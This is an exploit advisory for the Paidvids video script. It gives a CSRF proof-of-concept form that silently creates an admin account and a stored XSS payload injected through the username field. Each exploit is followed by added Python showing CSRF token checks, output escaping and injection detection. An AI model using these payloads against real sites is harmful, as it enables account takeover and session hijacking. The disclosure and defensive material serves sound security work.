# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://paidtasks.net/
# Demo Page: http://video.paidtasks.net/
# Version: 1.0
###########################
# CSRF Add Admin Exploit:
< -- bug code started -- >
<html>
<body>
<form action="http://video.
<input type="hidden" name="username" value="murrat" />
<input type="hidden" name="email" value="murrat@protonmail&#
<input type="hidden" name="pass" value="" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="country" value="82" />
<input type="hidden" name="coins" value="0.20" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="submit" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
< -- end of the bug code -- >
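The forged form above works because the victim's browser attaches its admin session cookie to a POST that the server cannot distinguish from one submitted through its own UI. As an added example (not part of this advisory and not Paidvids code), the following Python shows the server-side gate that defeats it: a session-bound synchroniser token that a cross-origin page cannot read, checked in constant time, plus an explicit permission check for the hidden `admin=1` field. The session and form dicts, the `csrf_token` field name, the `may_create_admins` flag and the server secret are all assumptions constructed for the example.

```python
import hashlib
import hmac

# Constructed server secret for this example only; a real deployment loads it
# from configuration, never from source.
SERVER_SECRET = b"constructed-example-secret"


def issue_csrf_token(session_id):
    """Synchroniser token bound to the session: HMAC(secret, session id).

    The server embeds this in its own admin forms; a page on another origin
    cannot read it, so a forged cross-site form cannot include it.
    """
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def add_member_is_allowed(session, form):
    """Gate for the hypothetical admin 'add member' handler.

    `session` is the server-side session for the cookie the browser sent;
    `form` is the parsed POST body (field names mirror the PoC form above).
    Returns (allowed, reason).
    """
    # The victim's browser sends its cookie with the forged request, so an
    # admin check alone does not stop CSRF; it only confirms who was targeted.
    if not session.get("is_admin"):
        return False, "not an admin session"
    expected = issue_csrf_token(session["id"])
    supplied = form.get("csrf_token", "")
    # Constant-time compare so a wrong token cannot be recovered byte by byte.
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    # A hidden admin=1 field is a privilege-escalation path; require an
    # explicit right on the session rather than trusting the form value.
    if form.get("admin") == "1" and not session.get("may_create_admins"):
        return False, "session not permitted to create admins"
    return True, "ok"


# Constructed requests: the fields the PoC form submits (no token) and a
# legitimate submission built from the server's own form.
FORGED_REQUEST = {"username": "murrat", "admin": "1", "submit": "Submit"}


def legitimate_request(session_id):
    return dict(FORGED_REQUEST, csrf_token=issue_csrf_token(session_id))


if __name__ == "__main__":
    admin = {"id": "sess-1", "is_admin": True, "may_create_admins": True}
    print(add_member_is_allowed(admin, FORGED_REQUEST))               # (False, 'missing or invalid CSRF token')
    print(add_member_is_allowed(admin, legitimate_request("sess-1")))  # (True, 'ok')
```

A token derived from the session id is one common pattern; storing a random per-session token and comparing against it works equally well. Either way the token must be compared with `hmac.compare_digest`, and the check belongs on every state-changing admin endpoint, not only the one shown.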
###########################
# Stored XSS Vulnerability:
Paidvids is vulnerable to a stored XSS when a user is edited with a
malicious payload in the username field. The JavaScript payload executes when another admin or editor opens the
"All Members" section from the left bar.
# How To Exploit:
Go to the admin panel and edit an existing user. Change the "username" to :
"><img src="c" onerror="alert(document.
Here is your alert.
PoC: http://prntscr.com/bew0df
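The "All Members" listing renders the stored username straight into markup, so a value that closes an attribute and opens a new tag runs in every admin's browser. As an added example (not part of this advisory and not Paidvids code), the Python below puts the vulnerable rendering pattern beside its hardened form, adds a conservative username allow-list for the edit/create path, and includes a small check that flags any tag the template itself does not emit. The member records, the row template and the `/admin/edit` path are constructed for the example.

```python
import html
import re

# Constructed sample records; the second username follows the shape of the
# advisory's payload (close the attribute with a quote, then inject a tag).
MEMBERS = [
    {"id": 1, "username": "alice"},
    {"id": 2, "username": '"><img src=c onerror=alert(1)>'},
]

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")


def username_is_valid(username):
    """Input-side control: accept only a conservative character set on edit/create."""
    return USERNAME_RE.fullmatch(username) is not None


def render_member_row_unsafe(member):
    """The pattern that causes the bug: the raw username is concatenated into HTML,
    once inside a quoted attribute and once as element text."""
    name = member["username"]
    return f'<tr><td><a href="/admin/edit?id={int(member["id"])}" title="{name}">{name}</a></td></tr>'


def render_member_row(member):
    """Output-side control: escape for both the attribute and the text context.
    quote=True also converts the double quote, which is what closes the attribute."""
    name = html.escape(member["username"], quote=True)
    return f'<tr><td><a href="/admin/edit?id={int(member["id"])}" title="{name}">{name}</a></td></tr>'


# The only tags the row template itself emits.
TEMPLATE_TAGS = {"tr", "/tr", "td", "/td", "a", "/a"}


def contains_injected_tag(rendered):
    """Review helper: any tag outside the template's own set means stored data
    reached the markup unescaped."""
    tags = {t.lower() for t in re.findall(r"<(/?[A-Za-z]+)", rendered)}
    return not tags <= TEMPLATE_TAGS


if __name__ == "__main__":
    for member in MEMBERS:
        print(username_is_valid(member["username"]),
              contains_injected_tag(render_member_row_unsafe(member)),
              contains_injected_tag(render_member_row(member)))
```

Escaping on output is the control that actually fixes the bug, because every place the username is displayed needs it; the input allow-list is defence in depth and would also reject the payload before it is stored.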
###########################